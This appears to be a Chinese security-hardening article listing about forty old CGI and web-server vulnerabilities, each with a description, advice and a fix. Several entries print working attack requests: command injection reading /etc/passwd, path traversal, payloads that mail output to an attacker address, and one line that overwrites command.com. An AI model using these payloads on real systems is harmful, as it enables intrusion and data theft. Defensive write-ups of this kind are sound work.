| 关键词: nbsp 建议 目录 cgi 程序 方法 入侵者 bin exe Web |
1.wguset.exe 描述: 如果您使用NT做为您的WebServer的操作系统,而且 “wguest.exe”存在于您的Web可执行目录中的话,入侵者将能利用 它阅读到您的硬盘上所有USR_用户能阅读的文件。 建议: 将wguset.exe从你的Web目录移走或删除。 解决方法: 将wguset.exe从你的Web目录移走或删除。 2.rguset.exe 描述: 如果您使用NT做为您的WebServer的操作系统,而且 rguest.exe存在于您的Web可执行目录中的话,入侵者将能利用它阅 读到您的硬盘上所有USR_用户能阅读的文件。 建议: 将rguset.exe从你的Web目录移走或删除。 解决方法: 将rguset.exe从你的Web目录移走或删除。 3. perl.exe 描述: 在cgi-bin执行目录下存在perl.exe,这属于严重的配置错 误。黑客可以在perl.exe后面加一串指令,利用浏览器在server上执 行任何脚本程序。 建议: perl.exe是放在任何带执行权限的web目录下都是不安全的。 解决方法: 在web目录下移除perl.exe这个程序。 4.shtml.exe 描述: 如果您使用Front Page作为您的WebServer,那么入侵者能够 利用IUSR_用户和shtml.exe入侵您的机器,做您不希 望的事。 建议: 将shtml.exe从你的Web目录移走或删除。 解决方法: 将shtml.exe从你的Web目录移走或删除。 5. wwwboard.pl 描述: wwwboard.pl程序容易引起攻击者对服务器进行D.O.S攻击。 建议: 如无必要可以删除该文件。 解决方法: 对get_variables的子程序中的下面这段: if ($FORM{'followup'}) { $followup = “1”; @followup_num = split(/,/,$FORM{'followup'}); $num_followups = @followups = @followup_num; $last_message = pop(@followups); $origdate = “$FORM{'origdate'}”; $origname = “$FORM{'origname'}”; $origsubject = “$FORM{'origsubject'}”; } 替换为: if ($FORM{'followup'}) { $followup = “1”; @followup_num = split(/,/,$FORM{'followup'}); $num_followups = @followups = @followup_num; $last_message = pop(@followups); $origdate = “$FORM{'origdate'}”; $origname = “$FORM{'origname'}”; $origsubject = “$FORM{'origsubject'}”; # WWWBoard Bomb Patch # Written By: Samuel Sparling [email protected]) $fn=0; while($fn < $num_followups) { $cur_fup = @followups $fn]; $dfn=0; foreach $fm(@followups) { if(@followups[$dfn] == @followups[$fn] && $dfn != $fn) { &error(board_bomb); } $dfn++; } $fn++; } # End WWWBoard Bomb Patch } 6. uploader.exe 描述: 如果您使用NT作为您的WebServer的操作系统,入侵者能够利 用uploader.exe上传任何文件 建议: 将uploader.exe从你的Web目录移走或删除。 解决方法: 将uploader.exe从你的Web目录移走或删除。 7. bdir.htr 描述: 如果您使用NT做为您的WebServer的操作系统,而且bdir.htr 存在于您的Web可执行目录中的话,入侵者将能利用它在您的服务器 上无止境的创建ODBC数据库,并生成一些可执行的文件。 建议: 将bdir.htr从你的Web目录移走或删除。 解决方法: 将bdir.htr从你的Web目录移走或删除。 8. Count.cgi 类型: 攻击型 描述: 在/cgi-bin目录下的Count.cgi程序(wwwcount2.3版本)有一 个溢出错误,允许入侵者无须登录而远程执行任何指令。 建议: 如无必要可以删除该文件。 解决方法: 将wwwcount升级到2.4或者以上。 9. test-cgi 描述: test-cgi这个文件可以被入侵者用来浏览服务器上的重要信 息。 建议: 建议审核cgi-bin目录下的执行程序,严格控制访问权限。 解决方法: 删除test-cgi文件。 10.nph-test-cgi 描述: nph-test-cgi这个文件可以被入侵者用来浏览服务器上的重 要信息。 建议: 建议审核cgi-bin目录下的执行程序,严格控制访问权限。 解决方法: 删除nph-test-cgi文件。 11. php.cgi 描述: php.cgi程序有较多的漏洞,包括缓存溢出漏洞,还有导致任 何系统文件可以被入侵者读取的漏洞 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 解决方法: 删除php.cgi程序是最好的办法。 12.handler 描述: IRIX 5.3, 6.2, 6.3, 6.4的/cgi-bin/handler程序存在缓存 溢出错误,允许入侵者在server上远程执行一段程序: telnet target.machine.com 80 GET /cgi-bin/handler/whatever;cat /etc/passwd| ? data=Download HTTP/1.0 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 解决方法: 删除handler文件。 13. webgais 描述: /cgi-bin,目录下的webgais是GAIS搜索工具的一个接口,它 有一个毛病使入侵者可以绕过程序的安全机制,执行系统命令: POST /cgi-bin/webgais HTTP/1.0 Content-length: 85 (replace this with the actual length of the “exploit” line) telnet target.machine.com 80 query=';mail+you\@your.host&domain=paragraph 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 解决方法: 删除webgais文件。 14.websendmail 描述: /cgin-bin目录下的websendmail程序允许入侵者执行一个系 统指令: telnet target.machine.com 80 POST /cgi-bin/websendmail HTTP/1.0 Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90) receiver=;mail+your_address\@somewhere.orger=a&rtnaddr=a&subject=a &content=a 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 解决方法: 高级用户:编辑websendmail脚本,过滤特殊字符。 一般用户:删除websendmail文件。 15.webdist.cgi 描述: 对于Irix6.2和6.3平台,/cgi-bin目录下的webdist.cgi有一 个弱点允许入侵者无须登录而在系统上执行任何指令: http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 解决方法: 删除/var/www/cgi-bin/webdist.cgi目录下的 webdist.cgi。 16. faxsurvey 描述: 在Linux S.u.S.E上/cgi-bin目录下的faxsurvey程序允许入 侵者无须登录就能在服务器执行指令: http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat% 20/etc/passwd 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 解决方法: 删除/cgi-bin/faxsurvey文件。 17. htmlscript 描述: 安装了htmlscript2.99x或者更早版本的服务器,存在一个毛 病使入侵者可以查看服务器上的任何文件: http://www.vulnerable.server.com/cgi- bin/htmlscript?../../../../etc/passwd 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 解决方法: 删除/cgi-bin/htmlscript脚本文件,或者将htmlscript 升级到3。0以上。 18. www-sql 描述: www-sql存在于/cgi-bin/目录下,这将导致入侵可以越权访 问被保护的文件。 建议: 最好删除www-sql文件。 解决方法: #if PHPFASTCGI while(FCGI_Accept() >= 0) { #endif s = getenv(“REDIRECT_STATUS”); if(!s) { puts(“Content-type: text/plain\r\n\r\nPHP/FI detected an internal error. Please inform [email protected] of what you just did.\n”); exit(1); } s = getenv(“PATH_TRANSLATED”); 19.名字: view-source 描述: 在cgi-bin目录下的view-source程序没有对输入进行安全检 查,使入侵者可以查看服务器上的任何文件 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 解决方法: 删除/cgi-bin目录下的viewsource程序。 20. campas 描述: 在cgi-bin目录下的campas程序有一个毛病可以使入侵者随意 查看server上的重要文件: telnet www.xxxx.net 80 Trying 200.xx.xx.xx... Connected to venus.xxxx.net Escape character is '^]'. GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 解决方法: 删除/cgi-bin目录下的campas程序。 21.aglimpse 描述: 在cgi-bin目录下的aglimpse程序有一个毛病可以使入侵者无 须登录而随意执行任何指令 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 解决方法: 删除/cgi-bin目录下的aglimpse程序。 22.AT-admin.cgi 描述: 在Excite for Web Servers 1.1上的/cgi-bin/AT-admin.cgi 程序,允许普通用户完全控制整个系统 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 解决方法: 删除/cgi-bin目录下的AT-admin.cgi程序。 23. finger 描述: 这个位于/cgi-bin下的finger程序,可以查看其它服务器的 信息,但是如果将参数改成本机,本机上的帐号信息将暴露无遗: /cgi-bin/finger?@localhost 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 解决方法: 删除/cgi-bin目录下的finger程序。 24. webwho.pl 描述: 如果在您的Web可执行目录中有webwho.pl这个CGI脚本,那么 入侵者将能利用他阅读启动Web的用户能读写执行的任何文件。 建议: 将webwho.pl从您的Web目录中删除或移走。 解决方法: 将webwho.pl从您的Web目录中删除或移走。 25. w3-msql 描述: MiniSQL软件包发行版本附带的一个CGI(w3-msql)可被用于以 httpd的uid权限执行任意代码。这个安全漏洞是由程序中的scanf() 函数引起的。 建议: 如果您安装了MiniSQL软件包,请您将/cgi-bin/目录下的w3- msql文件删除或移走 解决方法: 如果您安装了MiniSQL软件包,请您将/cgi-bin/目录下的 w3-msql文件删除或移走. 26. Netscape FastTrack server 2.0.1a 描述: UnixWare 7.1附带的Netscape FastTrack server 2.0.1a存 在一个远程缓冲区溢出漏洞。缺省地,监听457端口的httpd通过http 协议提供UnixWare文档。如果向该服务器传送一个长度超过367字符 的GET请求,会使缓冲区溢出,EIP值被覆盖将可能导致任意代码以 httpd权限执行。 建议: 临时解决方法是关闭Netscape FastTrack服务器。 解决方法: 临时解决方法是关闭Netscape FastTrack服务器。 27. AnyForm.cgi 描述: 位于cgi-bin目录下的AnyForm.cgi程序,是用于简单表单通 过邮件传递响应的,但该程序对用户输入检查不彻底,可被入侵者利 用,在server上执行任何指令。 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 解决方法:建议升级该cgi程序,或者删除该文件。 28. whois.cgi 描述:在多个WebServer中带有的Whois.cgi存在溢出漏洞。它们包 括: Whois Internic Lookup - version: 1.02 CC Whois - Version: 1.0 Matt's Whois - Version: 1 他们将使入侵者能够在您的系统上使用启动httpd用户的权限执行任 意的代码 建议: 将在您Web目录中问whois.cgi删除或移走。 解决方法: 将在您Web目录中问whois.cgi删除或移走。 29. environ.cgi 描述: 在Apache web server或者IIS等其它web server的/cgi- bin/environ.cgi 程序,有一个毛病允许入侵者绕过安全机制,浏览 服务器上的一些文件。 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 解决方法: 建议升级该cgi程序,或者删除该文件。 30. wrap 描述: /cgi-bin/wrap程序有两个漏洞,均允许入侵者获取服务器上 文件的非法访问,如: http://host/cgi-bin/wrap?/../../../../../etc 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 解决方法: 删除/cgi-bin/wrap文件。 31. edit.pl 描述: /cgi-bin/edit.pl有一个安全弱点,用下面这条命令就可以访 问用户的配置情况: http://www.sitetracker.com/cgi-bin/edit.pl? account=&password= 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。 解决方法: 删除/cgi-bin/edit.pl文件。 32.service.pwd 描述: UNix系统的 http://www.hostname.com/_vti_pvt/service.pwd可读,将暴露用户 密码信息。 建议: 建议删除 解决方法:chown root service.pwd chmod 700 service.pwd 33.administrators.pwd 描述: UNix系统的 http://www.hostname.com/_vti_pvt/administrators.pwd可读,将暴 露用户密码信息 建议: 建议删除 解决方法:chown root administrators.pwd chmod 700 administrators.pwd 34.users.pwd 描述: UNix系统http://www.hostname.com/_vti_pvt/users.pwd 可读,将暴露用户密码信息 建议: 建议删除 解决方法: chown root users.pwd chmod 700 users.pwd 35. authors.pwd 描述: UNix系统的 http://www.hostname.com/_vti_pvt/authors.pwd可读,将暴露用户 密码信息 建议: 建议删除 解决方法: chown root authors.pwd chmod 700 authors.pwd 36. visadmin.exe 描述: 在OmniHTTPd Web Server的cgi-bin目录下存在这个文件 visadmin.exe,那么攻击者只要输入下面的命令: http://omni.server/cgi-bin/visadmin.exe?user=guest 数分钟之后服务器的硬盘将会被撑满。 建议: 建议删除。 解决方法: 把visadmin.exe从cgi-bin目录中删除 37. get32.exe 描述: Alibaba的web server,其cgi-bin目录存在get32.exe这个程 序,允许入侵者任意执行一条指令: http://www.victim.com/cgi-bin/get32.exe|echo% 20>c:\command.com 建议: 建议删除。 解决方法: 把GET32.exe从cgi-bin目录中删除。 38. alibaba.pl 描述: Alibaba的web server,其cgi-bin目录存在alibaba.pl这个程 序,允许入侵者任意执行一条指令: http://www.victim.com/cgi-bin/alibaba.pl|dir 建议: 建议删除。 解决方法: 把alibaba.pl从cgi-bin目录中删除。 39. tst.bat 描述: Alibaba的web server,其cgi-bin目录存在tst.bat这个程 序,允许入侵者任意执行一条指令: http://www.victim.com/cgi-bin/tst.bat|type% 20c:\windows\win.ini 建议: 建议删除。 解决方法: 把tst.bat从cgi-bin目录中删除。 40.fpcount.exe 描述: 如果您使用NT作为您的WebServer的操作平台,并只安装了 SP3补丁,那么入侵者能利用这个CGI程序进行DoS攻击,使您的IIS服 务拒绝访问。 建议: 将在您Web目录中的fpcount.exe删除或移走。 解决方法: 将在您Web目录中的fpcount.exe删除或移走。 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|